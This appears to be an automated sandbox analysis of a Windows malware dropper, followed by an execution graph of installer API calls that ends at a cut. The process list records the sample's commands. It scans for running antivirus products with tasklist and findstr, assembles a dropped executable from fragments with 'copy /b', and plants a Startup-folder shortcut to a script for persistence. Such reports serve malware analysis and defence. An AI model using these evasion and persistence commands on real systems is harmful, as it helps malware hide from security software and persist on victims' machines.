                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:10:20:43
                                    Start date:23/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:10:20:46
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0xef0000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:10:20:46
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /I "opssvc wrsa"
                                    Imagebase:0x670000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:10:20:46
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0xef0000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:10:20:46
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                    Imagebase:0x670000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:10:20:47
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c md 159893
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:10:20:47
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\extrac32.exe
                                    Wow64 process (32bit):true
                                    Commandline:extrac32 /Y /E Beastiality
                                    Imagebase:0xd80000
                                    File size:29'184 bytes
                                    MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:9
                                    Start time:10:20:48
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /V "Patrick" Episode
                                    Imagebase:0x670000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:10:20:48
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c copy /b ..\Proceedings + ..\Deviation + ..\Ds + ..\Lived + ..\Formed + ..\Twiki + ..\Shoot + ..\Retrieval + ..\Pounds + ..\Roland H
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:10:20:49
                                    Start date:23/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\159893\Held.com
                                    Wow64 process (32bit):true
                                    Commandline:Held.com H
                                    Imagebase:0xa40000
                                    File size:947'288 bytes
                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Has exited:false

                                    Target ID:12
                                    Start time:10:20:49
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\choice.exe
                                    Wow64 process (32bit):true
                                    Commandline:choice /d y /t 5
                                    Imagebase:0x7f0000
                                    File size:28'160 bytes
                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:13
                                    Start time:10:20:49
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.url" & exit
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:14
                                    Start time:10:20:50
                                    Start date:23/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:10:21:00
                                    Start date:23/12/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js"
                                    Imagebase:0x7ff630c50000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:17
                                    Start time:10:21:00
                                    Start date:23/12/2024
                                    Path:C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com" "C:\Users\user\AppData\Local\GuardKey Solutions\a"
                                    Imagebase:0x850000
                                    File size:947'288 bytes
                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:17.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:21%
                                      Total number of Nodes:1482
                                      Total number of Limit Nodes:25
                                      execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 